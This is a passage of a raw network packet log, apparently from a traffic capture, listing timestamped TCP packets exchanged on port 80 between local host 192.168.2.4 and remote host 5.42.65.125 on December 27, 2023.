Dec 27, 2023 17:57:26.234616995 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.234632969 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.234970093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.235019922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.235033989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.235045910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.235074043 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.235080004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.235105038 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.235116959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.235131025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.235147953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.235162020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.235171080 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.235177994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.235194921 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.235223055 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.235312939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.235327005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.235338926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.235352039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.235362053 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.235367060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.235382080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.235394001 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.235394001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.235409021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.235419035 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.235420942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.235443115 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.235456944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.235471010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.235485077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.235502958 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.235528946 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.235528946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.235920906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.235934973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.235970974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.235980034 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.236005068 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.236011982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.236182928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.236351013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.236363888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.236377001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.236387968 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.236388922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.236403942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.236414909 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.236418009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.236432076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.236432076 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.236445904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.236458063 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.236458063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.236474991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.236484051 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.236486912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.236501932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.236505985 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.236521006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.236535072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.236546993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.236547947 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.236561060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.236567020 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.236577034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.236591101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.236591101 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.236604929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.236618042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.236629963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.236641884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.236641884 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.236664057 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.236682892 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.237016916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.237122059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.237134933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.237147093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.237159967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.237173080 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.237202883 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.237241983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.237256050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.237277985 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.237338066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.237350941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.237363100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.237374067 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.237377882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.237392902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.237397909 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.237406969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.237420082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.237432003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.237445116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.237447023 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.237457991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.237472057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.237474918 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.237512112 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.237525940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.237540007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.237550974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.237564087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.237571955 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.237576008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.237600088 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.238001108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.238013983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.238029957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.238043070 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.238044024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.238068104 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.238142967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.238157988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.238178968 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.238217115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.238230944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.238243103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.238255024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.238266945 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.238279104 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.238306999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.238341093 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.238354921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.238369942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.238382101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.238394976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.238413095 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.238439083 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.238460064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.238471985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.238483906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.238503933 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.238522053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.238534927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.238548040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.238554955 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.238563061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.238578081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.238581896 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.238611937 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.238626957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.238640070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.238652945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.238667011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.238671064 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.238734007 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.239103079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.239123106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.239135981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.239164114 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.239204884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.239244938 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.239258051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.239272118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.239295959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.239310026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.239316940 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.239342928 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.239357948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.239372015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.239386082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.239398956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.239402056 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.239413977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.239428997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.239428997 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.239443064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.239456892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.239469051 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.239496946 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.239500999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.239516020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.239522934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.239530087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.239537001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.239543915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.239550114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.239629984 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.239998102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.240046978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.240060091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.240075111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.240093946 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.240123987 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.240204096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.240219116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.240231991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.240252972 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.240262985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.240273952 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.240278006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.240293026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.240305901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.240317106 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.240319967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.240334034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.240340948 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.240349054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.240364075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.240365028 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.240379095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.240394115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.240402937 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.240407944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.240422964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.240436077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.240442991 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.240453005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.240468025 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.240500927 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.240504980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.240518093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.240530014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.240542889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.240550995 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.240555048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.240570068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.240577936 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.240614891 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.241216898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.241329908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.241343975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.241358042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.241364002 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.241374969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.241388083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.241399050 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.241400957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.241415977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.241429090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.241429090 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.241444111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.241456985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.241460085 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.241471052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.241485119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.241492987 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.241499901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.241513014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.241519928 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.241527081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.241539001 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.241542101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.241556883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.241568089 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.241569996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.241583109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.241591930 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.241596937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.241611004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.241625071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.241631031 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.241660118 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.242141008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.242198944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.242213011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.242225885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.242235899 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.242239952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.242261887 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.242280006 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.242393017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.242407084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.242420912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.242440939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.242449999 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.242455006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.242469072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.242475033 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.242485046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.242499113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.242505074 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.242512941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.242541075 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.242608070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.242621899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.242635965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.242645979 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.242650032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.242664099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.242670059 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.242680073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.242692947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.242706060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.242718935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.242718935 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.242733002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.242747068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.242752075 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.242760897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.242769957 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.242777109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.242784977 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.242810965 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.243211985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.243227005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.243266106 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.243385077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.243398905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.243581057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.243597031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.243608952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.243618965 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.243623018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.243637085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.243647099 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.243650913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.243664980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.243665934 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.243681908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.243690014 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.243694067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.243707895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.243716955 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.243721008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.243736982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.243752003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.243758917 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.243766069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.243778944 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.243782997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.243798018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.243810892 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.243813038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.243829012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.243834972 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.243843079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.243855953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.243870974 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.243887901 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.244096041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.244108915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.244122982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.244158030 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.244409084 CET	80	49738	5.42.65.125	192.168.2.4
